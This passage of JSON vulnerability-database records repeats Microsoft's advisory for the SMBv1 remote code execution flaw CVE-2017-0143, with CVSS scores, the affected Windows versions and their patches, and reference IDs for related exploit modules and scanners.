Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:45:18", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T16:54:43", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4012216", "KB3205401", "KB3205409", "KB4012215", "KB4012212", "KB3177186", "KB4013429", "KB3212646", "KB3210721", "KB4012213", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB4012217", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:54:43", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-09T05:02:02", "history": [], "viewCount": 9, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", 
"KLA11902", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012213", "KB3177186", "KB3205409", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB3212646", "KB4012214", "KB4012606", "KB3210720", "KB4012216", "KB4012217", "KB4012215", "KB4012598", "KB3205401", "KB4012212", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 
"Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": 
"KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core 